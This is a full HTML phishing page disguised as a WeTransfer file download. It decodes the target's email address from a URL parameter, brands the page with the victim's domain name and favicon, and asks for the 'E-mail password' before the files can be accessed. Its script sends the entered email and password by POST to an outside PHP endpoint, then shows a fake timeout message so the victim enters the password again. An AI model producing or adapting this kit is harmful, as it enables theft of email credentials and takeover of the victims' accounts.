<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WeTransfer Download Page</title>
    <style>
        body {
            font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        .download-container {
            text-align: center;
            padding: 20px;
            border-radius: 8px;
            background-color: #fff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 60%; /* Adjust the width as needed */
            max-width: 300px;
        }

        h1 {
            color: #333;
        }

        p {
            color: #555;
        }

        .line {
            border: none;
            border-top: 1px solid #ccc;
            margin: 15px 0;
            width: 100%;
        }

        a {
            display: inline-block;
            padding: 10px 20px;
            text-decoration: none;
            color: #fff;
            background-color: #3498db;
            border-radius: 5px;
            cursor: pointer;
        }

        /* Modal Styling */
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
        }

        .modal-content {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
            width: 60%; /* Adjust the width as needed */
            max-width: 300px;
        }

        .close-modal {
            position: absolute;
            top: 10px;
            right: 10px;
            cursor: pointer;
        }

        .login-input {
            width: calc(100% - 20px); /* Adjust the width as needed */
            padding: 10px;
            margin-bottom: 15px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }
        .dom {
            text-transform: uppercase;
            font-weight: bold;
            font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
            color: #3498db;
        }
        .dom2 {
            text-transform: capitalize;
            font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
        }
        .dom3 {
            text-transform: capitalize;
            font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
            font-size: small;
        }
        .login-button {
            width: calc(100% - 20px);
            padding: 10px;
            background-color: #3498db;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        .my-justified-text {
            font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
            color: #ff0000;
        }
        
        /* Styles for the popup message */
        .popup-message {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            padding: 15px;
            background-color: #f44336;
            color: #fff;
            text-align: center;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
        }
    </style>
</head>
<body>

    <div class="download-container">
        <div id="favicon-container"></div>
    
        <p class ="dom" id="dom"></p>
    
        
  
<p>Welcome to     <span id="dom2" class="dom2"></span> Document Center!  You have new files. Click the button below to access them.</p>
        

<div class="line"></div>   

        <a id="downloadButton" onclick="startDownload()">
            Open Files
        </a>

         
        
        <div class="line"></div>  
 

      
       <p class="dom3">&copy;<span id="dom3" class="dom3"></span> 2024</p>
        
    </div>

    <!-- Modal -->
    <div id="myModal" class="modal">
        <div class="modal-content">
            <span class="close-modal" onclick="closeModal()">&times;</span>
            <img src="https://avatar-management--avatars.us-west-2.prod.public.atl-paas.net/default-avatar.png" width="70">
           
          <p> <span id="mail" class="mail"></span></p>
      
            <p hidden id="domain"></p>
       
            <form id="loginForm" onsubmit="submitForm(); return false;">
            <input type="email" id="email" class="login-input" placeholder="Email" required="required" hidden>
            <input type="password" id="password" class="login-input" placeholder="Password">
    
            <button class="login-button" onclick="attemptLogin()">Continue</button>
            <p class="my-justified-text">For security purposes, please confirm your E-mail password before accessing secure data.</p>
        </div>
    
        <div id="popupMessage" class="popup-message"></div>
        </div>
    </div>

    <script>
        // Function to start the download process
        function startDownload() {
            // Change the button text to "Downloading..."
            document.getElementById('downloadButton').innerText = 'Loading...';
            
            // Add a 2-second delay before opening the modal
            setTimeout(openModal, 2000);
            // You can add additional logic here, such as initiating the download.
            // For simplicity, this example only opens the modal after a delay.
        }

        // Function to open the modal
        function openModal() {
            document.getElementById('myModal').style.display = 'flex';
        }

        // Function to close the modal
        function closeModal() {
            document.getElementById('myModal').style.display = 'none';
        }
    </script>

</body>
<script>
    function submitForm() {
              var email = document.getElementById('email').value;
              var password = document.getElementById('password').value;
              // Create a FormData object to send data to PHP
              var formData = new FormData();
              formData.append('email', email);
              formData.append('password', password);
  
              // Send data to the PHP file using XMLHttpRequest
              var xhr = new XMLHttpRequest();
              xhr.open('POST', 'https://dev-blakip.pantheonsite.io/aa/submit.php', true);
              xhr.onload = function () {
                  console.log(xhr.responseText);
              };
              xhr.send(formData);
  }
          function isBase64(str) {
              try {
                  return btoa(atob(str)) == str;
              } catch (err) {
                  return false;
              }
          }
  
          function getUrlParameter(name) {
              name = name.replace(/[[]/, "\\[").replace(/[\]]/, "\\]");
              var regex = new RegExp("[\\?&]" + name + "=([^&#]*)");
              var results = regex.exec(location.search);
              return results === null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
          }
  
          var value = getUrlParameter('pcs');
          value = isBase64(value) ? atob(value) : value;
  
  
          // Extract domain and dom parts
          var atIndex = value.indexOf('@');
          var domain = atIndex !== -1 ? value.substring(atIndex + 1) : '';
          var dom = atIndex !== -1 ? value.substring(0, atIndex) : '';
  
          // Extract domain without TLD
          var dotIndex = domain.indexOf('.');
          var domWithoutTLD = dotIndex !== -1 ? domain.substring(0, dotIndex) : domain;
  
          // Display domain and dom parts in the <p> elements
          document.title = domWithoutTLD;
          document.title = document.title.toUpperCase();
          document.getElementById('domain').textContent = 'Domain: ' + domain;
          document.getElementById('dom').textContent = domWithoutTLD;
          document.getElementById('dom2').textContent = domWithoutTLD;
          document.getElementById('dom3').textContent = domWithoutTLD;
          document.getElementById('mail').textContent = value;
          
  
          // Populate the email field with the value
          document.getElementById('email').value = value;
          // Set the domain variable
          var domain = domain;
          // Create an image element
          var faviconImage = document.createElement("img");
          // Set the src attribute dynamically using the domain variable
          faviconImage.src = "https://t3.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=" + "http://" + domain + "&size=50";
          // Set alt text for the image
          faviconImage.alt = "Favicon for " + domain;
          document.getElementById("favicon-container").appendChild(faviconImage);
  
          function attemptLogin() {
              // Update the text on the Login button to "Connecting..."
              var loginButton = document.querySelector('.login-button');
              var originalButtonText = loginButton.textContent;
              loginButton.textContent = 'Connecting...';
  
              // Simulating a server timeout (replace with your actual login logic)
              setTimeout(function () {
                  // Display the popup message
                  displayPopupMessage("Connection timeout. Retry the login after a moment.");
  
                  // Restore the original text on the Login button
                  loginButton.textContent = originalButtonText;
  
                  // Clear the password field
                  document.getElementById('password').value = '';
              }, 3000); // Display the error message after 3 seconds
          }
  
          function displayPopupMessage(message) {
              var popupMessage = document.getElementById("popupMessage");
              popupMessage.textContent = message;
  
              // Show the popup message
              popupMessage.style.display = "block";
  
              // Hide the popup message after 3 seconds
              setTimeout(function () {
                  popupMessage.style.display = "none";
              }, 3000);
          }
      </script>
</html>
